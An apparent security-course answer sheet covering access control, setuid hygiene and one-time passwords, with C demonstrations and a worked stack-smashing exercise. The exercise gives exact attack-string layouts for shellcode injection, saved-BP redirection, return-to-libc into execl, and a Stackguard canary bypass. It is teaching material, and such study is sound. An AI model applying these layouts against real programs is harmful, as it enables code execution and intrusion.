%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

--------------------------------------------------------------------------------------
20) "Trojan Horses provide a mechanism to defeat DAC, and hence motivate the need for MAC." Explain precisely what is meant here.
--------------------------------------------------------------------------------------

In DAC the protection of an object is the responsibility of its owner, and any program the owner runs acts with the owner's full rights. A Trojan horse run by the owner can therefore simply change the access permissions on an object (or copy its contents somewhere readable) so that anyone can access it, without violating any DAC rule. This motivates MAC, where the permissions are set by a central policy that programs run by users cannot override, so that a program can be confined to the access it needs (least privilege).
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

--------------------------------------------------------------------------------------
21) Some software providers argue that publishing source code is bad for security, as it makes it easier for attackers to find vulnerabilities. What is the flaw in this argument? (Hint: Is this an instance of "security by obscurity?") Your answer should be less than 30 words.
--------------------------------------------------------------------------------------

It is security by obscurity: hiding the source does not remove the flaws. Attackers can still find them by analysing the binary, while defenders lose the scrutiny that published, widely reviewed code receives.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
--------------------------------------------------------------------------------------
22) Consider a root-owned directory /abc which is world-writable. Suppose that it contains a root-owned file /abc/f that is writable only by its owner. Is there any way for a non-root user to change the contents of this file? How? (30 words or less.)
--------------------------------------------------------------------------------------
Yes. Write (with execute) permission on the directory governs its entries, not the files' contents: the user cannot open /abc/f for writing, but can unlink (or rename) it and create a new /abc/f with arbitrary contents. The new file is owned by the user, so any root process that later trusts /abc/f by name is fooled. The sticky bit (mode 1777, as on /tmp) prevents this by allowing only the file's owner, the directory's owner and root to remove an entry.
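The unlink-and-recreate step above, replayed in a scratch directory. This is an added example, not part of the original answer sheet: the root-owned file is simulated by a mode 0444 file that the current user owns, because what decides the outcome is that the file's mode forbids writing while the directory's mode (0777, no sticky bit) allows removing and creating entries. The directory name /tmp/abcXXXXXX and the contents are constructed for the demonstration; run as root, the direct write would succeed too, since root bypasses DAC.

```c
/* Added example (not from the original answer sheet): question 22 in a
 * scratch directory. File mode 0444 stands in for the root-owned file. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

static char dir[] = "/tmp/abcXXXXXX";   /* template for mkdtemp (assumption: /tmp is writable) */
static char path[64];                   /* dir + "/f" */

/* Build the situation of the question: world-writable directory, read-only file. */
int setup(void) {
    if (!mkdtemp(dir)) return -1;
    snprintf(path, sizeof path, "%s/f", dir);
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) return -1;
    if (write(fd, "original\n", 9) != 9) { close(fd); return -1; }
    close(fd);
    if (chmod(path, 0444) != 0) return -1;   /* the FILE: nobody may write it */
    if (chmod(dir, 0777) != 0) return -1;    /* the DIRECTORY: anybody may add/remove entries */
    return 0;
}

/* Step 1: opening the file for writing is checked against the file's mode. */
int direct_write_denied(void) {
    int fd = open(path, O_WRONLY);
    if (fd >= 0) { close(fd); return 0; }   /* succeeded (e.g. we are root) */
    return errno == EACCES;
}

/* Step 2: unlinking and recreating is checked against the directory's mode only. */
int replace_by_unlink(const char *new_contents) {
    if (unlink(path) != 0) return -1;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0644);
    if (fd < 0) return -1;
    size_t n = strlen(new_contents);
    int ok = write(fd, new_contents, n) == (ssize_t)n;
    close(fd);
    return ok ? 0 : -1;
}

/* What a root process that trusts /abc/f by name would now read. */
int read_contents(char *buf, size_t cap) {
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    ssize_t n = read(fd, buf, cap - 1);
    close(fd);
    if (n < 0) return -1;
    buf[n] = '\0';
    return (int)n;
}

void cleanup(void) { unlink(path); rmdir(dir); }

int main(void) {
    char buf[32];
    if (setup() != 0) { perror("setup"); return 1; }
    printf("open(O_WRONLY) denied by file mode: %d\n", direct_write_denied());
    printf("unlink + recreate succeeded: %d\n", replace_by_unlink("attacker\n") == 0);
    if (read_contents(buf, sizeof buf) > 0) printf("contents now: %s", buf);
    cleanup();
    return 0;
}
```

Setting the sticky bit on the directory (chmod 1777) makes the unlink in step 2 fail with EPERM for any user who owns neither the file nor the directory, which is exactly why /tmp carries it.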
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
--------------------------------------------------------------------------------------
23) What is the principle of fail-safe defaults, and how does it lead to increased security? Does it significantly decrease usability? Explain. (40 words or less.)
--------------------------------------------------------------------------------------
Fail-safe defaults: base access decisions on explicit permission rather than exclusion, so the default, and the outcome of any failure or unhandled case, is denial. Security improves because errors in the protection mechanism then show up as refused legitimate requests, which get noticed and reported, rather than as silent unauthorized access. The usability cost is modest: users occasionally have to ask for a grant. It becomes significant only in a badly designed system where failures are frequent.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
--------------------------------------------------------------------------------------
24) UNIX utilizes the privileged mode of execution provided by modern processors to ensure that user processes cannot access kernel memory. However, root-owned processes may be able to circumvent this protection by writing to the device /dev/kmem. Which security principle is being violated here? (Strictly 5 words or less.)
--------------------------------------------------------------------------------------
Principle of least privilege. (A root-owned process is given far more authority than its task needs; raw access to kernel memory through /dev/kmem lets it bypass the hardware protection boundary entirely.)
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
--------------------------------------------------------------------------------------
25) What is role-based access control? What is its primary benefit? (40 words or less.)
--------------------------------------------------------------------------------------
In RBAC, an alternative to plain DAC and MAC, permissions are attached to roles rather than to individual users, and users obtain permissions by being assigned to roles that reflect their job functions; an access decision depends on the roles active in the session, not on the user's identity. Its primary benefit is administrative: policy follows the organization's structure, so hiring, transfers and departures become role assignments instead of per-user permission edits, and a user can activate only the role a task needs (least privilege, separation of duty).
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
--------------------------------------------------------------------------------------
26) What is the “confused deputy” problem? (40 words or less.)
--------------------------------------------------------------------------------------
A confused deputy is a program that acts on behalf of other principals while holding authority of its own, and is tricked by one principal into using that authority for a purpose the principal is not entitled to. Hardy's example is a compiler service that may write its own billing file and is asked by a user to write the compiled output to that file's path: the deputy cannot tell whose authority the path should be checked against. The problem motivates capabilities: an unforgeable token that both designates the object and conveys the right to use it. The deputy then writes only where the caller has handed it a capability, so a caller can designate only files the caller could already write.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
--------------------------------------------------------------------------------------
27) In one of the early illustrations of the security provided by DTE, it was shown that it can help defeat “rootkit” attacks. Explain how.
--------------------------------------------------------------------------------------
The central weakness of UNIX security is the misuse of root: once an attacker obtains uid 0 nothing limits what she may modify, and a rootkit exploits that by replacing system binaries, kernel modules or login programs to hide its presence and persist. DTE (domain and type enforcement) assigns every process to a domain and every file to a type, and lets a domain access only the types (and enter only the domains) its policy lists, independently of the uid. In the early DTE demonstration the system binaries, kernel and configuration files were given types that ordinary domains could not write, including a root shell obtained through a compromised network daemon, so the installation step of a rootkit fails even though the attacker has root privileges. Only a narrow administrative domain, entered through trusted programs, may write those types: least privilege applied to root itself.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
--------------------------------------------------------------------------------------
28) What is the inference problem in databases? (40 words or less.)
--------------------------------------------------------------------------------------
Query results that are individually permitted (aggregates, statistics) can be combined to deduce records the user may not read; for example, two sums whose query sets differ by one row reveal that row. Defenses: a minimum size for query sets, refusing queries that overlap too much with earlier ones, adding random perturbation to outputs, and limiting the number of related queries per user.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
--------------------------------------------------------------------------------------
29) When a setuid-to-root executable is executed by a non-root process, the value of LD LIBRARY PATH is ignored by the system loader. Why? Are there other aspects of the invocation of setuid application that needs to be checked? (40 words or less.)
--------------------------------------------------------------------------------------
Because the invoking user controls the environment of the setuid program. If the loader honored LD_LIBRARY_PATH (or LD_PRELOAD), the user could point it at a directory holding a malicious libc and have that code run as root. Other state the program inherits from the untrusted caller must be checked as well: the remaining environment variables (PATH, IFS, locale), the set of open file descriptors (if 0, 1 or 2 are closed, the program's own opens land on them), resource limits, signal dispositions, umask, the current directory and argv. For the same reason the kernel disables ptrace attachment and core dumps for a setuid process: otherwise the real user could read or modify its memory.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
--------------------------------------------------------------------------------------
30) Consider the following scheme for generating one-time passwords P0, P1, P2, ... . P0 = EK(IV), where IV is an initial vector, and K is a secret key shared between the user and the system accepting OTPs, and EK denotes an encryption technique such as DES. For i > 0, Pi = H^(n-i)(P(i-1)).
--------------------------------------------------------------------------------------
No. With Pi = H^(n-i)(P(i-1)) each password is obtained by applying H to the previous one, so anyone who observes P(i-1) on the wire, and knows n and i (both public), can compute Pi and every later password. A one-time password chain has to run the other way. In Lamport's scheme the user keeps a secret seed s and reveals Pi = H^(n-i)(s) in order of decreasing exponent; the server stores the last accepted value and checks that H(Pi) equals the previously accepted P(i-1). Computing Pi from P(i-1) then requires inverting H, which a one-way hash function makes infeasible. Using EK with a block cipher such as DES for P0 is not the problem: with a secret K it is a perfectly good way to derive the secret seed.
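The two chain directions side by side, as an added example that is not part of the original answer sheet. H is replaced by a toy 64-bit mixing function (FNV-1a over the previous value), which is not a cryptographic hash; the argument is about the direction of derivation, which holds for any H. A constructed secret seed stands in for P0 = EK(IV), and n = 8.

```c
/* Added example (not from the original answer sheet): why the handout's
 * chain P_i = H^(n-i)(P_{i-1}) is forgeable and Lamport's P_i = H^(n-i)(seed)
 * is not. toy_hash is NOT cryptographic; it only has to be a function. */
#include <stdint.h>
#include <stdio.h>

#define N 8   /* number of passwords in the chain */

/* Stand-in for H: FNV-1a over the 8 bytes of x. */
uint64_t toy_hash(uint64_t x) {
    uint64_t h = 0xcbf29ce484222325ull;
    for (int i = 0; i < 8; i++) {
        h ^= (x >> (8 * i)) & 0xff;
        h *= 0x100000001b3ull;
    }
    return h;
}

/* H^k(x) */
uint64_t hash_pow(uint64_t x, int k) {
    while (k-- > 0) x = toy_hash(x);
    return x;
}

/* Handout scheme: P_i = H^(n-i)(P_{i-1}). Everything after P0 is a function
 * of the previous password and the public values n and i. */
uint64_t flawed_password(uint64_t p0, int i) {
    uint64_t p = p0;
    for (int j = 1; j <= i; j++) p = hash_pow(p, N - j);
    return p;
}

/* What an eavesdropper who captured P_{i-1} does to forge P_i. */
uint64_t flawed_forge_next(uint64_t p_prev, int i) {
    return hash_pow(p_prev, N - i);
}

/* Lamport's chain: P_i = H^(n-i)(seed), revealed for i = 1, 2, ... .
 * The server keeps only the last accepted value (initially H^n(seed)) and
 * accepts a candidate iff H(candidate) equals it. Forging P_i from the
 * observed P_{i-1} would mean inverting H. */
struct otp_server { uint64_t last_accepted; int accepted; };

void otp_server_init(struct otp_server *s, uint64_t seed) {
    s->last_accepted = hash_pow(seed, N);
    s->accepted = 0;
}

uint64_t lamport_password(uint64_t seed, int i) {
    return hash_pow(seed, N - i);
}

int otp_server_accept(struct otp_server *s, uint64_t candidate) {
    if (toy_hash(candidate) != s->last_accepted) return 0;  /* wrong value, or a replay */
    s->last_accepted = candidate;
    s->accepted++;
    return 1;
}

int main(void) {
    uint64_t p0 = 0x0123456789abcdefull;   /* constructed stand-in for E_K(IV) */
    uint64_t p2 = flawed_password(p0, 2);
    int forged = flawed_forge_next(p2, 3) == flawed_password(p0, 3);
    printf("handout scheme: P3 forged from P2 alone: %d\n", forged);

    struct otp_server s;
    otp_server_init(&s, p0);
    int a1 = otp_server_accept(&s, lamport_password(p0, 1));
    int a2 = otp_server_accept(&s, lamport_password(p0, 2));
    int replay = otp_server_accept(&s, lamport_password(p0, 2));
    int forward = otp_server_accept(&s, toy_hash(lamport_password(p0, 2)));
    printf("lamport: P1 %d, P2 %d, P2 replayed %d, H(P2) offered as P3 %d\n",
           a1, a2, replay, forward);
    return 0;
}
```

The last line of output is the whole point: in Lamport's scheme the only thing an eavesdropper can compute from P2 by running H forward is P1, which the server has already consumed.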
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
--------------------------------------------------------------------------------------
31) Identify whether each of the following mechanisms represent DAC (D), MAC (M), or neither (N).
--------------------------------------------------------------------------------------
    D   File permissions in UNIX
    D   File permissions in Windows
    M   DTE
    D   Access control lists (ACLs)
    M   MLS
    M   LOMAC
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
--------------------------------------------------------------------------------------
32) One of the key principles for improving OS security is that of breaking up monolithic root privilege into several smaller privileges. Which of the following relate to this principle?
--------------------------------------------------------------------------------------
    T   DTE
    T   POSIX capabilities
    T   Role-based access control
    T   Clark-Wilson policy
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
--------------------------------------------------------------------------------------
33) Which of the following statements are correct?
--------------------------------------------------------------------------------------
    T   All permission checking is done in UNIX based on the effective userid of a process
    F   All permission checking is done in UNIX based on the real userid of a process
    F   All permission checking is done in UNIX based on the saved userid of a process
    T   Processes with effective userid of zero can change their effective, real and saved userids to arbitrary values.
    F   The access system call can be used to check permissions based on saved userid. (access() checks against the real uid and gid.)
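The start-up hygiene a setuid program has to perform for itself, covering the checks asked for in question 29 and the uid semantics of question 33, as an added example that is not part of the original answer sheet. The loader's refusal to honor LD_LIBRARY_PATH and LD_PRELOAD protects only the dynamic-link step; the rest of the inherited state is the program's own problem. It assumes a POSIX/Linux system; the environment allow-list (TERM, LANG) is illustrative, and the privilege drop uses setreuid/setregid, which on Linux also reset the saved ids when the real id is changed.

```c
/* Added example (not from the original answer sheet): what a setuid
 * program should do before trusting anything it inherited from its caller. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

extern char **environ;

/* Illustrative allow-list; a real program keeps only what it needs. */
static const char *const allowed_env[] = { "TERM", "LANG", NULL };

static int env_allowed(const char *name) {
    for (int i = 0; allowed_env[i]; i++)
        if (strcmp(name, allowed_env[i]) == 0) return 1;
    return 0;
}

/* 1) Environment: drop every variable not on the allow-list (LD_*, IFS, a
 *    caller-chosen PATH, locale tricks). Names are copied out first because
 *    unsetenv() rewrites environ while we are walking it. Returns the
 *    number of variables removed, or -1 on allocation failure. */
int scrub_environment(void) {
    size_t n = 0, i;
    while (environ && environ[n]) n++;
    char **names = calloc(n + 1, sizeof *names);
    if (!names) return -1;
    for (i = 0; i < n; i++) {
        const char *eq = strchr(environ[i], '=');
        size_t len = eq ? (size_t)(eq - environ[i]) : strlen(environ[i]);
        names[i] = malloc(len + 1);
        if (!names[i]) return -1;            /* about to abort anyway */
        memcpy(names[i], environ[i], len);
        names[i][len] = '\0';
    }
    int removed = 0;
    for (i = 0; i < n; i++) {
        if (!env_allowed(names[i]) && unsetenv(names[i]) == 0) removed++;
        free(names[i]);
    }
    free(names);
    return removed;
}

/* 2) Descriptors 0-2: if the caller closed them, the program's first open()
 *    becomes its stdin/stdout/stderr and privileged output could land in an
 *    attacker-chosen file. Reopen any missing one on /dev/null. open()
 *    returns the lowest free descriptor, so walking 0,1,2 in order is exact. */
int ensure_std_fds(void) {
    int reopened = 0;
    for (int fd = 0; fd <= 2; fd++) {
        if (fcntl(fd, F_GETFD) != -1) continue;          /* already open */
        int got = open("/dev/null", fd == 0 ? O_RDONLY : O_WRONLY);
        if (got != fd) { if (got >= 0) close(got); return -1; }
        reopened++;
    }
    return reopened;
}

/* 3) Dropping privilege: set the real, effective AND saved ids (question 33),
 *    then verify, because an unchecked failed setuid leaves the process
 *    root. After a correct drop, regaining uid 0 must fail. */
int drop_privileges_permanently(uid_t uid, gid_t gid) {
    if (setregid(gid, gid) != 0) return -1;
    if (setreuid(uid, uid) != 0) return -1;
    if (getuid() != uid || geteuid() != uid || getgid() != gid || getegid() != gid)
        return -1;
    if (uid != 0 && seteuid(0) == 0) return -1;   /* saved uid was still 0: drop incomplete */
    return 0;
}

int main(void) {
    printf("environment variables removed: %d\n", scrub_environment());
    printf("standard descriptors reopened: %d\n", ensure_std_fds());
    printf("privilege drop to (%u,%u): %s\n", (unsigned)getuid(), (unsigned)getgid(),
           drop_privileges_permanently(getuid(), getgid()) == 0 ? "ok" : "FAILED");
    return 0;
}
```

Order matters: scrub the environment and descriptors while still privileged but before doing any privileged work, and drop privileges as early as the program's task allows; the explicit re-check after setreuid is what turns a silently failed drop into a hard error.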
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
34) STACK SMASHING

    int auth(const char *username, int ulen, const char *pass, int plen)
    {
        char *nbuf;
        char user[512];
        nbuf = malloc(buflen+1);           /* buflen is undeclared in the handout */
        bcopy(username, user, ulen);       /* no bounds check: ulen may exceed the size of user */
        bcopy(pass, nbuf, plen);           /* writes plen bytes wherever nbuf points */
        ....
    }

    void g(const char *username, int ulen, const char *pass, int plen)
    {
        char *s1 = "/bin/bash";
        char *s2 = "/bin/nologin";
        if (auth(username, ulen, pass, plen))
            execl(s1, s1, (char *)0);      // Execute login shell, or else
        execl(s2, s2, (char *)0);          // a program that prints an error and disconnects
    }

Assume that
  - the parameters to g are read from an untrusted source (e.g., a network connection),
  - local variables are allocated in the order in which they are declared, i.e., nbuf will be closer to the return address than user,
  - all local variables are accessed using a BP register. On entry into any function, the first instruction pushes the current BP value on the stack and sets BP to the value of SP. Thus the variable nbuf will be accessed using the address [BP-0], while user will be accessed using [BP-2052].
----------------------------------------------------------------------
(a) (OVERFLOWING RA, SBP, NBUF) Construct a simple stack-smashing attack on the function auth. Assume that the attacker knows the base of auth's stack frame is in the range of 0xb11110 to 0xb11118.

Model used below: words are 4 bytes; nbuf occupies the word just below the saved BP, at [BP-4], and user occupies the 2048 bytes below it (the offset 2052 given in the exercise is 4 + 512*4, i.e. the exercise treats each element of user as one word). Addresses are shown for a base BP anywhere in 0xb11110..0xb11118.

    higher addresses
    ---------------------------
    | argument plen           |  BP+20
    ---------------------------
    | argument pass           |  BP+16
    ---------------------------
    | argument ulen           |  BP+12
    ---------------------------
    | argument username       |  BP+8
    ---------------------------
    | return address          |  BP+4    (0xb11114 .. 0xb1111c)
    ---------------------------
    | saved BP                |  BP+0    (0xb11110 .. 0xb11118)   <- base of frame
    ---------------------------
    | nbuf (local pointer)    |  BP-4    (0xb1110c .. 0xb11114)
    ---------------------------
    | user[511] .. user[508]  |  BP-8
    | ...                     |
    | user[3]   .. user[0]    |  BP-2052 (0xb1090c .. 0xb10914)   <- start of user
    ---------------------------
    lower addresses (the stack grows this way)

The first bcopy copies ulen bytes into user with no bound, so a username longer than 2048 bytes runs upward over nbuf, the saved BP, the return address and the arguments. The distance of each slot from the start of user is fixed by the code (nbuf at +2048, saved BP at +2052, return address at +2056), so the attacker does not need the absolute base to hit the return address; the base is only needed to decide where the new return address should point. The attack string (username) is:

    offset 0        : NOP sled, at least 9 bytes to cover the 8-byte uncertainty; in practice much longer (as [1] notes, overflows are made far larger than the minimum)
    after the sled  : shellcode, e.g. execve("/bin/sh")
    up to 2048      : filler
    2048 .. 2051    : new nbuf = a writable address inside the filler region of user, e.g. 0xb10c00, so that the second bcopy writes somewhere harmless (or send plen = 0)
    2052 .. 2055    : filler for the saved BP (any value; execve replaces the process before it matters)
    2056 .. 2059    : new return address = 0xb10914

The jump target is the highest possible start of user. Whatever the true base, 0xb10914 lies 0 to 8 bytes into user, i.e. inside the sled; the NOPs execute upward (toward higher addresses) into the shellcode. bcopy copies a byte count, so zero bytes in the addresses are no problem. The string is best cut off at the return address: repeating the address further up is harmless for the username and ulen slots but would put a huge value into plen, which the second bcopy still reads from the frame.

Frame after the first bcopy, before auth returns:

    ---------------------------
    | 0xb10914                |  BP+4   return address ---------+
    ---------------------------                                 |
    | filler                  |  BP+0   saved BP                |
    ---------------------------                                 |
    | 0xb10c00 (harmless)     |  BP-4   nbuf                    |
    ---------------------------                                 |
    | filler                  |                                 |
    | shellcode               |  <- execution arrives here      |
    | NOP NOP NOP ... NOP     |                                 |
    | NOP NOP NOP NOP NOP NOP |  user+0 .. user+8 <-------------+  (0xb1090c .. 0xb10914)
    ---------------------------

When auth executes ret, control lands in the sled and slides into the shellcode, which runs with the privileges of the process (the server that called g).
------------------------------------------------------------------------
(b) (OVERFLOWING SBP) Consider a variation of the above attack that targets the saved BP without corrupting the return address. The goal of this attack is to modify the saved BP so that when control returns from auth to g, the local variables s1 and s2 point to attacker-controlled values. Construct this attack so that the attacker can execute "/bin/sh" even if auth returns 0. Again, show all the relevant details. Assume for this problem that the attacker knows the exact base address of auth's stack frame to be 0xb11110.

With the base known exactly, user starts at 0xb11110 - 2052 = 0xb1090c. The overflow now stops one word short of the return address: username is exactly 2056 bytes, overwriting nbuf (at user+2048) and the saved BP (at user+2052) and nothing above. When auth returns, its epilogue restores BP from the corrupted slot, so g continues with an attacker-chosen frame base F and reads its locals relative to F: by the allocation rule of the exercise, s1 is at [F-4] and s2 at [F-8]. If both words point at a "/bin/sh" string that the attacker also placed in user, then execl(s2, s2, 0) runs /bin/sh whether or not auth returned 0.

Layout of username (base 0xb11110):

    user+0    .. user+7      "/bin/sh\0"                    at 0xb1090c
    user+8    .. user+11     0xb1090c   (becomes s2, read from F-8)
    user+12   .. user+15     0xb1090c   (becomes s1, read from F-4)
    user+16   .. user+2047   filler
    user+2048 .. user+2051   nbuf = a writable address inside user, e.g. 0xb10c00 (the second bcopy writes there harmlessly)
    user+2052 .. user+2055   saved BP = F = user+16 = 0xb1091c
    (the return address at user+2056 is not touched)

Frame as auth returns:

    ---------------------------
    | return address (intact) |  BP+4  = 0xb11114
    ---------------------------
    | F = 0xb1091c            |  BP+0  = 0xb11110   -> g's BP after the return
    ---------------------------
    | 0xb10c00                |  BP-4  = 0xb1110c   nbuf
    ---------------------------
    | filler                  |
    ---------------------------
    | 0xb1090c                |  0xb10918 = F-4  -> s1
    | 0xb1090c                |  0xb10914 = F-8  -> s2
    | "/bin/sh\0"             |  0xb1090c .. 0xb10913
    ---------------------------

No code is injected, so this works with a non-executable stack. It relies on g reading s1 and s2 through BP (the third assumption of the exercise) and on the contents of user surviving until execl is called.

------------------------------------------------------------------------
(c) (OVERWRITE RA) Construct a return-to-libc attack that exploits the vulnerability in auth. Your attack should return to the beginning of the library function execl located at address 0x800000 with the first parameter "/bin/sh". Show all of the relevant details of the attack string that achieves this objective.

A return-to-libc attack overwrites the return address with the address of an existing library function and the words above it with the frame that function expects, so no code is injected and a non-executable stack is no obstacle. Here the return address becomes 0x800000 (execl) and the words above it become what execl sees on entry: a return address for execl (unused, since execl does not return on success), then its arguments path = "/bin/sh", arg0 = "/bin/sh" and the 0 that ends the argument list. The string itself goes at the start of user (0xb1090c, base 0xb11110 as in (b)). bcopy copies a byte count, so the zero bytes in 0x800000 and in the terminating 0 are copied faithfully.

    user+0    .. user+7      "/bin/sh\0"                     at 0xb1090c
    user+8    .. user+2047   filler
    user+2048 .. user+2051   nbuf = 0xb10c00 (writable; its value no longer matters, see below)
    user+2052 .. user+2055   saved BP: any value
    user+2056 .. user+2059   return address = 0x800000 (execl)
    user+2060 .. user+2063   return address for execl: any value
    user+2064 .. user+2067   first argument  = 0xb1090c ("/bin/sh")
    user+2068 .. user+2071   second argument = 0xb1090c (argv[0])
    user+2072 .. user+2075   0x00000000 (end of execl's argument list)

    ---------------------------
    | 0x00000000              |  BP+20  (was plen)
    | 0xb1090c   argv[0]      |  BP+16  (was pass)
    | 0xb1090c   path         |  BP+12  (was ulen)
    | any        execl's RA   |  BP+8   (was username)
    | 0x800000   execl        |  BP+4   return address
    | any                     |  BP+0   saved BP
    | 0xb10c00                |  BP-4   nbuf
    | filler                  |
    | "/bin/sh\0"             |  user+0 = 0xb1090c
    ---------------------------

A side effect helps: the overflow also replaces plen with 0, and auth re-reads plen from its frame for the second bcopy, which therefore copies nothing. When auth executes ret, SP points at BP+8 and control enters execl with exactly the frame it would have had after g called execl("/bin/sh", "/bin/sh", 0).

------------------------------------------------------------------------
(d) (ATTACKING WITH CANARY: DOUBLE POINTER ATTACK) Now assume that Stackguard is used to protect against the vulnerability in auth. (Recall that Stackguard writes a random-valued canary at the beginning of the function on the stack; assume that this write takes place at the location next to the saved BP, so that both BP and RA are protected by the canary. Before return, this value is checked, and if the value is different from the one that was written at the beginning of the function, an attack is flagged.) Show that it is still possible to corrupt the return address by first corrupting nbuf to point to the RA, and then using the second bcopy to corrupt it. Provide the relevant details of the username and pass buffers to achieve an injected code attack.

Frame with Stackguard's canary just below the saved BP (base 0xb11110):

    ---------------------------
    | return address          |  BP+4    = 0xb11114
    ---------------------------
    | saved BP                |  BP+0    = 0xb11110
    ---------------------------
    | canary (random)         |  BP-4    = 0xb1110c
    ---------------------------
    | nbuf                    |  BP-8    = 0xb11108
    ---------------------------
    | user[511] .. user[0]    |  BP-9 .. BP-2056 (start 0xb10908)
    ---------------------------

Stackguard detects only a write that passes through the canary on its way to the control data. The second bcopy gives a way around that, because it writes through a pointer that the first overflow can redirect:

1) First bcopy: username is 2048 + 4 = 2052 bytes. The first 2048 bytes fill user with a NOP sled followed by shellcode; the last 4 bytes land exactly on nbuf and set it to 0xb11114, the address of the return address. The copy stops there, so the canary is never touched.
2) Second bcopy: bcopy(pass, nbuf, plen) now copies pass straight into the return address slot. With plen = 4 and pass = 0xb10908 (the start of the NOP sled in user; with the 8-byte uncertainty of (a), the highest possible start), the return address is replaced without any write crossing the canary. The check before return passes, ret jumps into the sled, and the shellcode runs.
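The double-pointer bypass of (d) on a simulated frame, as an added example that is not part of the original answer sheet. The frame is a C struct with the same ordering as the handout's stack (buffer, then nbuf, canary, saved BP, return address at increasing addresses); both bcopy calls are real memcpy calls into that object, so the overflow stays inside the simulation and nothing else is corrupted. Addresses are native pointers rather than the 0xb11110 constants of the exercise, and the canary and return values are constructed markers.

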